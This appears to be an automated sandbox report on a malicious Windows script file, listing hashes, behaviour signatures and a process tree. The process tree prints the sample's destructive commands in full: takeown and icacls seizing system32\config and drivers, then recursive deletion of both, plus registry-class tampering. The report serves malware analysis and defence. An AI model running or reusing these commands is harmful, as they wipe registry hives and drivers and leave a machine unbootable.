Analysis

  • max time kernel
    139s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-08-2024 21:40

General

  • Target

    target.wsf

  • Size

    3KB

  • MD5

    84b27604951d4deb2f10cc65c8f5c8a4

  • SHA1

    74b27bad7133462abf462923dd3d056a4d655941

  • SHA256

    ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9

  • SHA512

    d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 5 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4984
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2024
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4228
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3672
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3472
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2412
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4060
      • C:\Windows\System32\reg.exe
        "C:\Windows\System32\reg.exe" add HKCR\*.dll
        3⤵
        • Modifies registry class
        PID:2564
      • C:\Windows\System32\reg.exe
        "C:\Windows\System32\reg.exe" add HKCR\*.exe
        3⤵
        • Modifies registry class
        PID:1332
      • C:\Windows\System32\reg.exe
        "C:\Windows\System32\reg.exe" add HKLM\*
        3⤵
        • Modifies registry key
        PID:3432
  • C:\Windows\regedit.exe
    "C:\Windows\regedit.exe"
    1⤵
    • Runs regedit.exe
    PID:2968

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs

    Filesize

    3KB

    MD5

    84b27604951d4deb2f10cc65c8f5c8a4

    SHA1

    74b27bad7133462abf462923dd3d056a4d655941

    SHA256

    ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9

    SHA512

    d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce

  • C:\Users\Admin\Desktop\DenyRedo.vbs

    Filesize

    79B

    MD5

    dfcef0997fe6b53193f96908bc2d7839

    SHA1

    bec87de5852184953fe5025aa7a6017e23deead1

    SHA256

    9d2e842fed982dd1f6d185c93feedacb4ac5670f61d9f1934509f159e62a6168

    SHA512

    ed4c7fc86525e24651e5c10533da47065d78076b47caacbb08003ed7b475ac23b41fe623b9db5330b3d947ee9df6043f2bf8c77722cab99a864ae5f7d90a2f74